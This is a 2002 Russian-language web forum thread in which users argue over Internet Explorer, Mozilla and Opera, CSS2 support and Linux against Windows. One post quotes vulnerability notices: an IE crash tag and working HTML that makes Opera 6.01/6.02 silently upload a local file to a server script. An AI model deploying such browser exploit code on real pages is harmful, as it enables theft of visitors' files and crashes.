Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » Программы » Браузерные войны

Модерирует : gyra, Maz

Widok (01-10-2004 22:40): переезд: http://forum.ru-board.com/topic.cgi?forum=5&topic=13160  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

   

Браузерные войны
 ОтветГолосаПроценты
IE287
25.58%
Opera476
42.42%
Netscape26
2.32%
Mozilla137
12.21%
Другой23
2.05%
надстройки над IE173
15.42%
Тема закрыта .Всего Голосов: 1122
Kobold



Flame monster
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Во-первых, я лично сомневаюсь что в PCSuite есть всё что есть в комплектации MS Office (Word, Excel, Powerpoint, Access, FrontPage, Outlook) и куча мелочи типа редакторов формул и т.п., во-вторых, на 3-х компактах, кроме офиса еще куча всякой туфты типа картинок и т.п., а папка с инсталляцией офиса XP весит 260 метров.

Если сомневашься - проверь. Ппоробуй этот офис, СтарОфис, что их, мало?
 

Цитата:
Не так давно??? Интересно... Кстати на том же болиде Формулы-1, используется 3-4 проца уровня P3, типа шатл это не такое сложное устройство? Кстати думаю, если бы NASA так нужны были такие процы, то они без особых проблем наладили бы их производство, учитывая их расходы на различные космические программы...

На болиде Формулы 1 условия намного мягче и ошибка стоит намного меньше. Вот и юзают прогрессивные технологии.
 

Цитата:
Кстати у меня так и сделано, у меня на клаве кнопка выключения питания открывает менюшку, кнопка приостановки работает по назначению без всяких менюшек.
Так их и используют разные проги для разных целей.

Чудесно. А я хочу испрользовать их для своих целей. По одной или в комбинациях. Ну что, долго ещё ты будещь оправдывать ненастраиваемость клавы?
 

Цитата:
Просто чтобы сделать софтину такого качества, нужен громадный опыт, причем не только в программировании, а и в дизайне. Именно поэтому  Photoshop считается неоспоримым лидером среди редакторов растровой графики. Кстати, Photoshop 6 получил награду как лучшая софтина прошлого года.

Или пробуй и говори конкретно, что не нравится, или отдыхай. А то пошла очередная дурь в стиле "только большая фирма может создать качественную серверную операционную систему". Создавали и без больших фирм.
 

Цитата:
Какой новой ОС? Переход на XP обычно осуществляется с других виндов, и никаких проблем с переходом, не будет. А вот переход на Linux действительно потребует много времени на обучение.

Ты редко встречал людей, которые вызванивают "специалиста", тогда у них сдыхает домашняя страничка брузера. Пробег по настройкам и отключение умных нововведений ХР - не для них.
 

Цитата:
Любая... Хотя есть люди которые результаты вычислений на калькуляторе, на счетах проверяют. Наверное фирмы того же уровня и на 286х работают.

И какие же задачи бухгалтерии фирмы с сотней-другой сотрудников требуют машины выше 486?
 

Цитата:
И что? Ты можешь на своем компе сделать что-либо подобное? Пробовал кто-то на своем 166/32 (или может на твоем любимом 286м) нелинейный монтаж делать, с различными эффектами и т.п.? Или ты думаешь, что у WinXP какие-то проблемы со скоростью будут на компьютере который позволяет нормально заниматься видео?  

Кто про что, а я про наличие софта для желающих. И нафига ты сюда древние компы приплел?
 

Цитата:
Это всё конечно хорошо, а если инета нету?

А если под виндой инета нету, а хочется по асе поговорить? То же самое, звоним знакомому - компьютерщику.
 

Цитата:
Самая стабильная WinXP. А ядро NT по-твоему никогда не менялось, а да, его специально линуксоидам заказывают делать  

Ты совершенно прав. Загляни-ка в C:\Windows\system32\drivers\etc\ и подумай, почему на твоей машине работает инет.
 

Цитата:
Еще ниразу IE6 не вырубал систему. Вообще чтобы вырубить XP нужно очень-очень сильно постараться. Так что падений всей системы я не наблюдал, наверное с перехода на XP. Именно поэтому я работаю на ней.

А я наблюдал падения. И не один раз.
 

Цитата:
А ты часом не скачал версию IE для XP? А вообще на 98 лучше всего наверное IE5.5 ставить. Хотя у знакомых на 98/ ME IE6 отлично "бегает" (хотя компы у них пошустрее, чем у тебя)

Кстати, как там с удалением нового ИЕ из системы? Он удаляется или старается не дать пользователю допустить величайшую ошибку в его жизни - отказ от использования лучшего в мире браузера?
 


----------
Tanned in cathode ray sunshine

Всего записей: 1838 | Зарегистр. 11-12-2001 | Отправлено: 23:41 23-10-2002 | Исправлено: Kobold, 23:43 23-10-2002
Bozo



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Kobold
По одной или в комбинациях. Ну что, долго ещё ты будещь оправдывать ненастраиваемость клавы? Ну а меня мультимедийная клава. И хочу в Линуксе почту вызывать и громкость настраивать спецкнопками которые для этого на клаве есть. И как это сделать? Да никак!

Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 00:31 24-10-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору

Цитата:
Да не то, это она столько RAM хавает, совсем чуть-чуть...  

не намного больше 98й

Цитата:
если ИЕ5 вспомнить, который в 98 вшит, то кучи плюсов потеряются, ха-ха, но ИЕ6 весит около гига, потому что с ХР

Ну IE5.5 тоже отличный броузер, IE6 нормально работает на WinME и Win98, если скачать версию под эту ось. Кстати я уверен, что то что нормально покажет IE6, нормально покажет и IE5.5.

Цитата:
По крайней мере, пофиксили много, и работа продолжается, намного быстрее, чем над ИЕ

Ну так и багов больше Например, я пробовал Мозиллу когда страничку новую делал, она очень не любит их обновлять, чего я только не нажимал (и стоит обновление при каждой загрузке), пришлось вырубить, включить тогда обновила, это типа нормально?
К тому же IE не нужно надрываться, у них броузер намного стабильнее и багов меньше, да и лидируют они.

Цитата:
Вопрос на засыпку: зачем придумывали CSS2

Там куча туфты есть, не особо кому-то нужной. По-поводу моих сайтов на HTML3.2 врятли, мне нравится DHTML юзать.

Цитата:
Именно потому что IE пользуются 95% и сайты "затачивают" так чтобы в IE все отображалось как задумано

Ну так, а я о чем говорю, а под Мозиллу их делать никто не будет, поэтому если они хотят что-то отвоевать у IE, они должны показывать как IE.

Цитата:
Можешь увидеть здесь разницу в отображении мозиллой и IE

Ну это относится к той же баге с DIV'ами. А как ее увидят владельцы старых броузеров того же NN4? А вообще чел загадочный, вверху использует таблицу, а там DIV'ы, но ты покажи хоть какой-то более-менее серьезный дизайн, который будет юзать DIV?

Цитата:
я на сайтах информацию ищу, а не дизайном любуюсь

ну так тебе и текстового броузера хватит
 
А вообще посмотрел стандарт CSS2 потестил на разных броузерах примерчики, и могу заявить не один из современных броузеров не поддерживает полностью CSS2, ни IE6, ни Opera6, ни Мозилла 1.1. Причем не понимают они чаще всего разные вещи. Хотя в этом CSS2 столько всего напридумывали, я просто думаю что не особо хотят всё это реализовывать, т.к. это может сильно замедлить процесс рендеринга страниц, а толку от этого будет мало, ИМХО.
Kobold

Цитата:
Ппоробуй этот офис, СтарОфис, что их, мало

Ага и где я его откопаю?

Цитата:
На болиде Формулы 1 условия намного мягче и ошибка стоит намного меньше. Вот и юзают прогрессивные технологии

Ну как показали тесты, P4 не горит даже без кулера и радиатора, но работает всеравно пошустрее 486. И как я уже сказал, если NASA понадобится они смогут договориться как с Intel, так и с AMD

Цитата:
Создавали и без больших фирм

Дело не в величине фирмы, дело в опыте фирмы...

Цитата:
То же самое, звоним знакомому - компьютерщику

У меня нет знакомых юзающих Linux, так что звонить некому...

Цитата:
А я наблюдал падения. И не один раз.

Ну если Linux слетала когда в Мозилле очень большой шрифт выводишь, то о чем говорить. Я не говорил что XP совсем завалить нельзя, есть люди талантливые. Но работы в течении недели без перезагрузок мне хватает.

Цитата:
Он удаляется или старается не дать пользователю допустить величайшую ошибку в его жизни - отказ от использования лучшего в мире браузера

Ну так его же специально встроили, чтобы антимонопольный коммитет не вякал

Цитата:
а меня мультимедийная клава. И хочу в Линуксе почту вызывать и громкость настраивать спецкнопками которые для этого на клаве есть.

Аналогично, громкость в XP с клавы регулируется даже без установки дров.

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 01:03 24-10-2002
Kobold



Flame monster
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Bozo
С чего ты это взял?
 
zapimir

Цитата:
Ага и где я его откопаю?

У кого там возле дома диски вагонами продаются?
 

Цитата:
Дело не в величине фирмы, дело в опыте фирмы...

Флейм гонять легче чем пробовать новый софт.
 

Цитата:
У меня нет знакомых юзающих Linux, так что звонить некому...

Тот кто ищет, всегда найдет... Когда я родился, у меня тоже не было знакомых Линуксоидов. Представляешь, как-то нашел.
 

Цитата:
Ну если Linux слетала когда в Мозилле очень большой шрифт выводишь, то о чем говорить. Я не говорил что XP совсем завалить нельзя, есть люди талантливые. Но работы в течении недели без перезагрузок мне хватает.

Падал не Линукс, а один из серверов протокола X11 (конкретно - XFree86). А есть и другие... Да и к машине с упавшим XFree86 можно без каких-либо напрягов приSSHишся и перезапустить сервер.

----------
Tanned in cathode ray sunshine

Всего записей: 1838 | Зарегистр. 11-12-2001 | Отправлено: 01:31 24-10-2002 | Исправлено: Kobold, 01:54 24-10-2002
Bozo



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
могу заявить не один из современных броузеров не поддерживает полностью CSS2, ни IE6, ни Opera6, ни Мозилла 1.1. Вот только в мозилле не поддерживаются редкоиспользуемые фичи, а в IE бОльшая часть.
Хотя в этом CSS2 столько всего напридумывали, я просто думаю что не особо хотят всё это реализовывать, т.к. это может сильно замедлить процесс рендеринга страниц, а толку от этого будет мало, ИМХО.
Толку от этого тем больше чем больше трафик исходящий у твоего сайта. Видимо трафик твоего сайта не так велик, чтобы тебе пришлось задумываться, как бы его снизить. Почитай форум ixbt, какой у них канал, какой ежедневный исходящий траффик у конференции, и почему MN перевел движок конфы не на HTML 3.2 а на CSS + JS. И специально пишет, что он ><y# клал на пользователей NN4, и не будет ради 2-3 неудачников увеличивать расходы по оплате трафика. И правильно все делает, я целиком за.  
 
Нажми на ссылку "сайт" в моих постингах.

Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 01:42 24-10-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Kobold

Цитата:
У кого там возле дома диски вагонами продаются?  

Ну вагонами не продаются, но расскладки по несколько сотен компактов попадаются очень часто, хотя большая часть из них - фильмы и мызыка. Софт для Linux большая редкость... Вот винду купить, или офис это без проблем.

Цитата:
Флейм гонять легче чем побовать новый софт.  

И аналог Dream'а есть под Linux? Понимаешь, просто даже под Винду есть проги аналоги Photoshop, и от Corel, и от Macromedia, и других фирм, и стоят они тоже порядочно (да и фирмочки весьма солидные). Но всеравно с Photoshop как-то приятнее работать. Вот поэтому я довольно скептически отношусь к gimp, для того чтобы написать, аналог Photoshop, мало быть классным программистом...
А попробовать тяжеловато, хотя бы потому что для начала нужно все это достать (ту же Linux), установить для этого нужно выделить отдельный раздел диска, потом ознакомиться с Linux, с gimp и т.п. К тому же, всеравно я очень давно юзаю Photoshop, у меня есть толстенные книги по нему, и работаю с ним не на уровне продвинутого чайника, не скажу что я супер художник/дизайнер, но то, что мне нужно сделать с фотками или с графикой, я сделаю быстро и без особых проблем. К тому же на всё это нужна куча времени, я не могу выделить его, для того чтобы просто сравнить Linux и Win, особенно после моего не самого лучшего знакомства с Linux RedHat (кстати её ставил чтобы скрипты потестить в более реальных условиях, ну и чисто из любопытства). Я надеюсь ты не будишь спорить что для виндов софта больше, и найти-то что тебе нужно проще?

Цитата:
Когда я родился, у меня тоже не было знакомых Линуксоидов

Ха-ха. Когда я родился еще и о MS-DOS никто ничего не знал

Цитата:
Падал не Линукс, а один из серверов протокола X11 (конкретно - XFree86). А есть и другие...

Ну ты меня успокоил. В XP из-за больших шрифтов ничего не падает
Кстати с PDF вроде у Мозиллы проблемы?
 
Добавлено
Bozo

Цитата:
Вот только в мозилле не поддерживаются редкоиспользуемые фичи, а в IE бОльшая часть.

А кто определяет какие редкоиспользуемые, а какие нет? По-моему как раз то что в IE есть то и часто используемое, а вот то что в мозилле редкоиспользуемое, или я не прав?

Цитата:
перевел движок конфы не на HTML 3.2 а на CSS + JS. И специально пишет, что он ><y# клал на пользователей NN4, и не будет ради 2-3 неудачников увеличивать расходы по оплате трафика. И правильно все делает, я целиком за.  

Ну и что у IE есть проблемы с ixbt??? По-моему у мозиллы их больше. А причем тут HTML3.2 я не понимаю, мне лично тоже уже давно плевать как выглядит сайт на NN, хотя честно говоря, и как сайт выглядит на мозилле меня мало волнует, ничего специально ради 1% юзеров я переделывать не буду. А того что умеет IE хватает выше крыши для сайта любой сложности.

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 02:06 24-10-2002
Kobold



Flame monster
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
zapimir

Цитата:
Ну вагонами не продаются, но расскладки по несколько сотен компактов попадаются очень часто, хотя большая часть из них - фильмы и мызыка. Софт для Linux большая редкость... Вот винду купить, или офис это без проблем.

Есть Старофис для Винды. Он даже солидной фирмой сделан. Попробуй найти или скачать.
 

Цитата:
И аналог Dream'а есть под Linux? Понимаешь, просто даже под Винду есть проги аналоги Photoshop, и от Corel, и от Macromedia, и других фирм, и стоят они тоже порядочно (да и фирмочки весьма солидные). Но всеравно с Photoshop как-то приятнее работать. Вот поэтому я довольно скептически отношусь к gimp, для того чтобы написать, аналог Photoshop, мало быть классным программистом... А попробовать тяжеловато, хотя бы потому что для начала нужно все это достать (ту же Linux), установить для этого нужно выделить отдельный раздел диска, потом ознакомиться с Linux, с gimp и т.п. К тому же, всеравно я очень давно юзаю Photoshop, у меня есть толстенные книги по нему, и работаю с ним не на уровне продвинутого чайника, не скажу что я супер художник/дизайнер, но то, что мне нужно сделать с фотками или с графикой, я сделаю быстро и без особых проблем. К тому же на всё это нужна куча времени, я не могу выделить его, для того чтобы просто сравнить Linux и Win, особенно после моего не самого лучшего знакомства с Linux RedHat (кстати её ставил чтобы скрипты потестить в более реальных условиях, ну и чисто из любопытства). Я надеюсь ты не будишь спорить что для виндов софта больше, и найти-то что тебе нужно проще?

 
Есть версия gimp для винды (конечно, при переносе появились новые косяки, например, с планшетами, но поработать можно). Для продвинутого чайника или вебмастера, которому не надо рисовать Джоконду - подойдет любой редактор, включая gimp. А профи ставят И шоп, и Painter, и Corel Photopaint. Ни один спец по графике не ограничится одним продуктом.
 

Цитата:
Ну ты меня успокоил. В XP из-за больших шрифтов ничего не падает  

Да не цепляйся ты к незначительному багу, заделанному за несколько дней. Иксы тоже от этого давным-давно не падают.
 

Цитата:
Кстати с PDF вроде у Мозиллы проблемы?

А какие у браузера могут быть проблемы с pdf? Это не его дело - pdf показывать. Для этого у пользователя должен стоять pdf-ридер.
 
Про Формулу-1 и НАСА. П4 ещё не проверен. НАСА будет рассматривать его использование разве что к моменту выхода П6.

----------
Tanned in cathode ray sunshine

Всего записей: 1838 | Зарегистр. 11-12-2001 | Отправлено: 02:33 24-10-2002
biomednet



Schwarz Meister
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
народ, давайте заканчивать драку по ОС. Это не здесь. Здесь только браузеры.
Качество браузеров можно сравнивать с нескольких позиций. С позиции количества правильности отображения большинства страниц, с точки зрения поддержки стандартов, еще куча позиций.....
 
Далее, по поводу новых фич... кто ввел Java и Java Script? Фреймы?
Уж не мелкософт ли?

Цитата:
 
 Кстати с PDF вроде у Мозиллы проблемы?

Пардон? Я юзаю американский патентный сайт и не жалуюсь. Надо только поставить Аdobe Acrobat Reader , от фирмы, которая этот формат и делает...
Кстати,
Цитата:
FrontPage, Outlook) и куча мелочи типа редакторов формул  

Ой! Нет! Пожалуйста не надо!!!! Вот только Аутглюка мне нехватало...
Редактор формул - стандарт ВО ВСЕМ МИРЕ ISIS Draw!!!
Это я Вам со всей ответственностью заявляю. Юзать микрософт для этих целей - извращение.

Цитата:
А того что умеет IE хватает выше крыши для сайта любой сложности.

Детская болезнь наворотов и попугайного дизайна....
Где Вы видели нормальных серьезных людей, разряженных так, что иначе как клоунадой это не назовешь...
И нечего кивать на мой сайт. У меня тоже нет вкуса, но я способен это понять, а Вы пижонствуете. Сайт можно и нужно сделать так, чтобы было видно, штучная работа и со вкусом, а не дешевая бижутерия.
"Новогодняя елка"...
Кстати, вопрос не в тему и без контекста: Как для IE сделать полупрозрачное меню на  сайте, чтобы оно при скроллинге не ездило вместе со страницей...

----------
Nytt Land - Ritual

Всего записей: 2295 | Зарегистр. 12-08-2002 | Отправлено: 08:05 24-10-2002 | Исправлено: biomednet, 08:11 24-10-2002
Bozo



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
biomednet
На CSS2 это делается через DIV и position: fixed. А IE такую мелочь естественно не поддерживает Вот и ответ, что zapimir какие фичи из CSS2 нужны народу.
 
zapimir Ты так и не ответил для чего придумали CSS2.
 
Ну и что у IE есть проблемы с ixbt??? Нет, потому что естественно MN использовал только поддерживаемые IE фичи CSS. Потому как приходится _затачивать_ под IE.
 
А проблемы с ixbt у большинства использующих Admuncher, popupcop и т.п.
JS который написал MN режется этими прогами. Об этом целая ветка есть.

Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 11:38 24-10-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
biomednet

Цитата:
Надо только поставить Аdobe Acrobat Reader , от фирмы, которая этот формат и делает...  

Я читал что Мозилла не показывает pdf файлы при закрытом Reader'е.

Цитата:
Ой! Нет! Пожалуйста не надо!!!! Вот только Аутглюка мне нехватало...  

Это не обсуждается... Он там есть, я его юзаю и не только я, и он не пропустил пока ни одного вируса, хотя приходят постоянно всякие вирусняки.

Цитата:
Как для IE сделать полупрозрачное меню на  сайте, чтобы оно при скроллинге не ездило вместе со страницей

Вот это как раз и есть "Детская болезнь наворотов и попугайного дизайн", все эти извращения с меню... лучше статического меню для сайта нету.
Bozo

Цитата:
zapimir какие фичи из CSS2 нужны народу

Народу который пока не сделал не одной путней страницы, и которого нет вкуса

Цитата:
Потому как приходится _затачивать_ под IE

Так мозиллы тогда даже в проете не было, что под неё нужно было затачивать? Ну так скажи пусть переточит под Мозиллу, интересно как далеко он тебя пошлет

Цитата:
JS который написал MN режется этими прогами

У меня popupcop и никаких проблем с  ixbt не было. Конечно, если ты отключишь JS, то что ты хочешь чтобы тебе показали?

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 12:42 24-10-2002
biomednet



Schwarz Meister
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
 Вот это как раз и есть "Детская болезнь  

Я имел ввиду пестрые кричащие тона и усложнение страницы до такой степени, что только один из браузеров нормально ее отображает.
Вот я у Вас, как у специалиста(без кавычек) спрашиваю, возможно ли сделать на чем-либо полупрозрачное меню?
Кстати Вы астон и/или Win2000/XP никогда не юзали? это к вопросу о полупрозрачности.

Цитата:
Аутглюка мне нехватало...  
 
Это не обсуждается... Он там есть, я его юзаю

А причем здесь вирусы? Вы The Bat! пробовали?
Я не пожалел денег на лицензию, потому что софт этого стоил.
А вот за аутглюк я бы не стал столько платить.
Кстати я нормально отношусь к виндам на основе NT...


----------
Nytt Land - Ritual

Всего записей: 2295 | Зарегистр. 12-08-2002 | Отправлено: 13:00 24-10-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору

Цитата:
Вот я у Вас, как у специалиста(без кавычек) спрашиваю, возможно ли сделать на чем-либо полупрозрачное меню?  

Еще на IE4 можно было делать полупрозрачные меню, по-моему у него есть для этого специальные фильтры, можно около 20 разных эффектов делать, часто получаются очень толковые вещи. Но я лично считаю, что сделать статическое меню. Кстати есть специальные софтины, которые делают практически любые меню для IE, насчет других броузеров не уверен.
А вообще хватит уже разводить базар о том что нужнее, и т.п. Когда у мозиллы будет хотябы 20-30% рынка тогда это будет более-менее актуально, а пока что, всеравно всё будут писать под IE. Кстати со временем, еще глянем как у Мозиллы обстоят дела с DHTML (т.е. возможность изменения любых свойств, любых элементов с помощью JS.

Цитата:
Кстати Вы астон и/или Win2000/XP никогда не юзали? это к вопросу о полупрозрачности.

Астон я не юзаю, но уже полностью и давно перешел на WinXP, до этого стояли 2000 и ME, так как некоторый софт в 2k не работал, после установки XP необходимость в ME или другой win9x отпала. 2000/XP позволяют делать окна полупрозрачными, с регулируемой величиной прозрачности, знаем, юзаем. Например, DUmeter.

Цитата:
Вы The Bat! пробовали?  

Пробовал, тогда не произвел он на меня большого впечатления, к тому же у него вроде до сих пор проблемы с HTML письмами (насколько я понял из последних топиков о проблемах The Bat!)
Может The Bat! лучше Outlook Express, но Outlook, ИМХО, лучше, хотя это опять же дело вкуса, и того что Outlook это не только почтовый клиент.

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 14:02 24-10-2002
Bozo



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
У меня popupcop и никаких проблем с  ixbt не было. Значит popupcop писали знающие программеры и это хорошая прога. А Symantec - это корпорация в которой работает тупое быдло, потому что ее продукты не дружат с дизайном forum.ixbt У меня стоит NIS2003 retail и при включении Ad blocking и Popup window blocking от страниц forum.ixbt.com остается пустое место. Она режет .js. По какому принципу она считает, что это рекламные скрипты- я не знаю. Но проблемы такие есть. И js я не отключал в принципе ни разу в жизни и не понимаю, зачем это нужно делать? Просвети.
 
Так мозиллы тогда даже в проете не было, что под неё нужно было затачивать? Ну так скажи пусть переточит под Мозиллу, интересно как далеко он тебя пошлет Он не посылает, а регулярно доводит сайт до ума и исправляет ошибки и отступления от стандартов w3c в своем коде. Его постоянно пинают пользователи mozilla+linux и квалифицированные знатоки  html которых на ixbt в силу специфики их аудитории немало.
 
Добавлено
zapimir

Цитата:
Кстати со временем, еще глянем как у Мозиллы обстоят дела с DHTML (т.е. возможность изменения любых свойств, любых элементов с помощью JS.  

Именно с DHTML ты обломишься, т.к. в мозилле поддерживается стандартный js 1.5, а не ms jscript, и скрипты сделанные под ms, не работают, да и не должны, в мозилле.

Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 14:10 24-10-2002
biomednet



Schwarz Meister
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
DoS-атака на Internet Explorer
[20.04.2002] <br> При вызове страницы со строчкой <OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT> Internet Explorer начинает отъедать 100% процессора, после чего благополучно падает.  
Источник; http://www.xspider.ru/
 
Добавлено
Удаленный просмотр файлов в Opera
[28.05.2002]  
Уязвимые версии 6.01, 6.02. Чтобы просмотреть любой файл на удаленном компьютере, достаточно вставить в страницу следующий код:
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt " style="visibility:hidden">
</form>
</body>  
 
 
Добавлено

Цитата:
 А вообще хватит уже разводить базар о том что нужнее, и т.п.

Почему? Ведь именно этим и определяется используемость того или иного софта, и браузеры - не исключение.
Вопрос собственно, звучал, можно ли и как сделать статичные(наперемещаемые) полупрозрачные меню так, чтобы пользователи IE и Mozilla И Opera могли их одинаково видеть...
И вообще в принципе, можно ли сделать любой элемент дизайна так же(по видимости)
И какие  важные элементы дизайна могут быть нормально сделаны под IE и принципиально невозможны в остальных браузерах.
Т.е. такое, аналога чему нет ни у кого.
Если же выяснится, что ничего такого нет и все можно сделать видимым одинаково, то вообще в чем предмет спора? Тогда это просто элемент предпочтений в удобстве интерфейса - использование того или иного браузера и вежливости ( или умения) веб-мастера.
 
Добавлено

Цитата:
 2000/XP позволяют делать окна полупрозрачными, с регулируемой величиной прозрачности, знаем, юзаем.

Так зачем же говорить тогда, что это  

Цитата:
 Вот это как раз и есть "Детская болезнь наворотов и попугайного  


----------
Nytt Land - Ritual

Всего записей: 2295 | Зарегистр. 12-08-2002 | Отправлено: 14:28 24-10-2002
abramx



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
biomednet

Цитата:
DoS-атака на Internet Explorer  
[20.04.2002] <br> При вызове страницы со строчкой <OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT> Internet Explorer начинает отъедать 100% процессора, после чего благополучно падает.  
Источник; http://www.xspider.ru/  

Не подтверждаю. IE 6 SP1, Windows XP

Всего записей: 1123 | Зарегистр. 11-02-2002 | Отправлено: 15:04 24-10-2002
biomednet



Schwarz Meister
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
 Не подтверждаю.

ИМХО эту страничку crash.htm они сварили и именно ее надо вызвать, тогда видимо будет эффект... это ведь сообщение их сканера....
По поводу pdf - этот формат служит для хранения одновременно и текстовой и графической информации. При публикации научных статей это стандарт. Именно он, а не rtf или doc.
Открыв в adobe Acrobat Reader документ, можно выделять и копировать  
части текста как при работе с обычным текстом. Просто отображать в браузере ДОКУМЕНТЫ в формате pdf размером 400-700 Кб  а то и больше метра - идиотизм. Это НЕ КАРТИНКИ! Нужны полноценные инструменты для работы с документом.
 
А скачиваются документы адоба не хуже зипа или рара....

----------
Nytt Land - Ritual

Всего записей: 2295 | Зарегистр. 12-08-2002 | Отправлено: 15:13 24-10-2002 | Исправлено: biomednet, 15:18 24-10-2002
rkhasano



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Mozilla

Всего записей: 519 | Зарегистр. 20-10-2002 | Отправлено: 15:20 24-10-2002
Farch



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
http://www1.xakep.ru/post/16663/default.asp
без комментариев.

Всего записей: 3211 | Зарегистр. 25-12-2001 | Отправлено: 20:28 24-10-2002
Vinsent_Vega

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Пока что ниче лучше IE я не нашел. Так что юзаю его с большим удовольствием.

Всего записей: 1446 | Зарегистр. 15-10-2002 | Отправлено: 21:56 24-10-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Bozo

Цитата:
Но проблемы такие есть. И js я не отключал в принципе ни разу в жизни и не понимаю, зачем это нужно делать?

Я тоже, но есть люди, которые боятся, что c помощью JS попортят их комп

Цитата:
Его постоянно пинают пользователи mozilla+linux и квалифицированные знатоки  html которых на ixbt в силу специфики их аудитории немало

Не знаю сколько его там пинают, но факт остается фактом, он до сих под IE.

Цитата:
Именно с DHTML ты обломишься, т.к. в мозилле поддерживается стандартный js 1.5, а не ms jscript, и скрипты сделанные под ms, не работают, да и не должны, в мозилле.

Да дело не в том какая версия JS, если мозилла поддерживает 1.5, она должна поддерживать и предыдущие. А какое принципиальное различие между jscript и javascript? Как говорится найди десять различий
А вообще скрипты от IE не работают в Mozille по нескольким причинам, у IE более продвинутая объектная модель, например, и у IE есть свои фичи. К тому же у Мозиллы там еще багов хватает.
biomednet

Цитата:
чтобы пользователи IE и Mozilla И Opera могли их одинаково видеть

Почти наверняка - нет. Да и никто страдать этим не будет (разве что у кого-то масса свободного времени)

Цитата:
Т.е. такое, аналога чему нет ни у кого.

Я уже говорил о некоторых вещах которых нет в других броузерах, которые нравятся заказчикам, и которым наплевать, что это не показывается в других броузерах.

Цитата:
Если же выяснится, что ничего такого нет и все можно сделать видимым одинаково, то вообще в чем предмет спора

У Оперы таких расхождений множество, кстати Мозилла неправильно показывает HR.

Цитата:
Тогда это просто элемент предпочтений в удобстве интерфейса - использование того или иного браузера и вежливости ( или умения) веб-мастера

Ты мало сайтов видел которые в Мозилле/Опере криво показываются? Нравится тебе Мозилла - юзай её на здоровье, нравится Опера - юзай её, я не собираюсь кого-то, в чем-то переубеждать, просто мне не понравились необоснованное "опускание" IE, я показал, что Мозилла тоже далеко не совершенна, причем даже до уровня IE ей еще нужно дорости, начало неплохое, но она еще очень сырая.

Цитата:
Так зачем же говорить тогда, что это  

Одно дело когда показывается график скорости коннекта полупрозрачным (оно по задумке не должно сильно бросаться в глаза), а другое дело меню, ну сделай еще там надписи цвета фона ИМХО, полупрозрачным нужно делать вещи которые в принципе не сильно важны, чтобы на них не акцентировать внимание.

Цитата:
По поводу pdf - этот формат служит для хранения одновременно и текстовой и графической информации.

Я отлично знаю зачем он, вообще-то задача pdf - платформонезависимые документы. Не все pdf очень большие, к тому же когда смотришь их сразу в IE, они открываются постепенно, так что возможно тебе и не понадобится закачивать их полностью. Ты кстати видел как они в IE загружаются?

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 03:38 25-10-2002 | Исправлено: zapimir, 03:44 25-10-2002
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Компьютерный форум Ru.Board » Компьютеры » Программы » Браузерные войны
Widok (01-10-2004 22:40): переезд: http://forum.ru-board.com/topic.cgi?forum=5&topic=13160


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru